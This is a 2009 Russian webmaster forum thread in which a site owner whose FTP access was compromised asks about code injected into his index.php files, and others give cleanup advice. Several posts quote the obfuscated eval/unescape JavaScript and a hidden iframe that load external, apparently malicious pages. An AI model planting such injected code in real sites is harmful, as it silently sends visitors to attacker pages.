X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> Взломали Ftp доступ к хостингу
shtrih
shtrih
Topic Starter сообщение 14.6.2009, 21:49; Ответить: shtrih
Сообщение #1


Бывалый
****

Группа: User
Сообщений: 459
Регистрация: 2.4.2008
Из: Питер
Поблагодарили: 21 раз
Репутация:   6  


Здравствуйте!
Кто то получил доступ к моему серверу и на всех моих сайтах прописал в index.php вот это:



<script></script><script>eval(unescape("%76%61%72%20%66%32%38%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%31%2c%31%30%38%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%31%35%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%31%31%31%2c%31%31%32%2c%31%30%31%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%31%30%2c%31%30%35%2c%31%30%33%2c%31%30%34%2c%31%31%36%2c%31%31%32%2c%39%37%2c%31%31%34%2c%31%31%36%2c%31%32%31%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%66%32%38%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));</script>


это можно расшифровать?
И вообще что в этих ситуациях надо делать?
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mr4q
mr4q
сообщение 14.6.2009, 21:58; Ответить: mr4q
Сообщение #2


Верстаю дорого
*****

Группа: Active User
Сообщений: 697
Регистрация: 18.9.2007
Из: Харьков, Украина
Поблагодарили: 325 раз
Репутация:   79  


Ифрейм

<script></script><script>eval(unescape("var f28 = String.fromCharCode(104,116,116,112,58,47,47,101,108,97,110,116,114,97,115,97,11
0,116,114,111,112,101,46,114,117,47,110,105,103,104,116,112,97,114,116,121,46,10
4
,116,109,108);document.write(unescape('<iframe src=\''+f28+'\'></iframe>'));"));</script>

1. Сменить пароли.
2. Обрыть все index.php и шаблоны и удалить мусор.

Сообщение отредактировал mr4q - 14.6.2009, 22:00


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Olney
Olney
сообщение 14.6.2009, 22:08; Ответить: Olney
Сообщение #3


Бывалый
****

Группа: User
Сообщений: 442
Регистрация: 25.5.2009
Поблагодарили: 103 раза
Репутация:   23  


shtrih - смените пароли на FTP, почистите файлы и проверьте компьютер на вирусы.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Погодин
Погодин
сообщение 14.6.2009, 22:10; Ответить: Погодин
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 363
Регистрация: 21.4.2008
Из: Москва
Поблагодарили: 73 раза
Репутация:   12  


shtrih, удали этот код, проверь компьютер утилитой CureIt! и поменяй пароль на ftp.


--------------------
Куплю домен скрытый ЯК (раcсмотрю все тематики). Зона, АГС - не важно.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ecasoft_ru
ecasoft_ru
сообщение 14.6.2009, 22:22; Ответить: ecasoft_ru
Сообщение #5


Старожил
******

Группа: Active User
Сообщений: 1416
Регистрация: 29.3.2009
Поблагодарили: 327 раз
Репутация:   59  


А сами не сливали случайно траф?


--------------------
По делом...
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shtrih
shtrih
Topic Starter сообщение 14.6.2009, 22:49; Ответить: shtrih
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 459
Регистрация: 2.4.2008
Из: Питер
Поблагодарили: 21 раз
Репутация:   6  


Пароли сменил.
Пароль сложный стоял... перебор исключён. Стояли 2 партнёрки по сливу трафа попандер и 1андер, но они стояли только на двух сайтах, на остальных партнёрок небыло.
Посмотрел дату изменения index.php , подчти все файлы были изменены вчера в 11:45 и сегодня он ещё 1 файл в 6:35 менял

Сообщение отредактировал shtrih - 14.6.2009, 22:56
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Fabregas
Fabregas
сообщение 14.6.2009, 22:57; Ответить: Fabregas
Сообщение #7


Бывалый
****

Группа: User
Сообщений: 439
Регистрация: 9.1.2009
Из: odessa
Поблагодарили: 112 раз
Репутация:   13  


Пароль сложный стоял... перебор исключён

естественно...ftp чаще всего вирусами ломаются, при этом вирус мог быть у вас год назад, а ftp поломать теперь. Было дело...


--------------------
Мои лайфхаки для путешественника и все в таком духе.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shtrih
shtrih
Topic Starter сообщение 14.6.2009, 23:00; Ответить: shtrih
Сообщение #8


Бывалый
****

Группа: User
Сообщений: 459
Регистрация: 2.4.2008
Из: Питер
Поблагодарили: 21 раз
Репутация:   6  


mr4q, а что за Ифрейм такой? что он делает?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
shtrih
shtrih
Topic Starter сообщение 14.6.2009, 23:10; Ответить: shtrih
Сообщение #9


Бывалый
****

Группа: User
Сообщений: 459
Регистрация: 2.4.2008
Из: Питер
Поблагодарили: 21 раз
Репутация:   6  


вот, ещё такой скрипт отискал..


<iframe src="http://filmbridgelife.cn:8080/index.php" width=146 height=175 style="visibility: hidden"></iframe><script></script><script>eval(unescape("%76%61%72%20%66%32%38%20%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%30%34%2c%31%31%36%2c%31%31%36%2c%31%31%32%2c%35%38%2c%34%37%2c%34%37%2c%31%30%31%2c%31%30%38%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%39%37%2c%31%31%35%2c%39%37%2c%31%31%30%2c%31%31%36%2c%31%31%34%2c%31%31%31%2c%31%31%32%2c%31%30%31%2c%34%36%2c%31%31%34%2c%31%31%37%2c%34%37%2c%31%31%30%2c%31%30%35%2c%31%30%33%2c%31%30%34%2c%31%31%36%2c%31%31%32%2c%39%37%2c%31%31%34%2c%31%31%36%2c%31%32%31%2c%34%36%2c%31%30%34%2c%31%31%36%2c%31%30%39%2c%31%30%38%29%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%27%3c%69%66%72%61%6d%65%20%73%72%63%3d%5c%27%27%2b%66%32%38%2b%27%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29%29%3b"));</script>


интересно, что он делает?
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
zazik
zazik
сообщение 14.6.2009, 23:58; Ответить: zazik
Сообщение #10


Старенький
*****

Группа: Active User
Сообщений: 723
Регистрация: 18.12.2008
Из: Владимир
Поблагодарили: 178 раз
Репутация:   46  


Пользователи в фоновом режиме уходят на другой сайт вроде, сделай то что сказали в первых двух постах и не парься


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Взломали аккаунт Алиекспресс
Внимание мошенники
13 Intersect 500 Вчера, 20:42
автор: Emtec
Горячая тема (нет новых ответов) ApiSystem.ru - открытый доступ к Контентному API Яндекс.Маркет
56 zuziken 41182 8.12.2017, 16:50
автор: zuziken
Горячая тема (нет новых ответов) "ВКонтакте" и "Одноклассники" ограничили доступ к музыке
38 MissContent 3240 7.11.2017, 23:06
автор: moneytuz
Открытая тема (нет новых ответов) Disqus залатала дыру, через которые взломали аккаунты в 2012
1 jack 495 9.10.2017, 21:44
автор: harold_may
Открытая тема (нет новых ответов) Дуров рассказал о попытках ФБР получить доступ к данным пользователей Telegram
13 MissContent 1795 17.9.2017, 2:37
автор: darbas


 



RSS Текстовая версия Сейчас: 17.12.2017, 16:10
Дизайн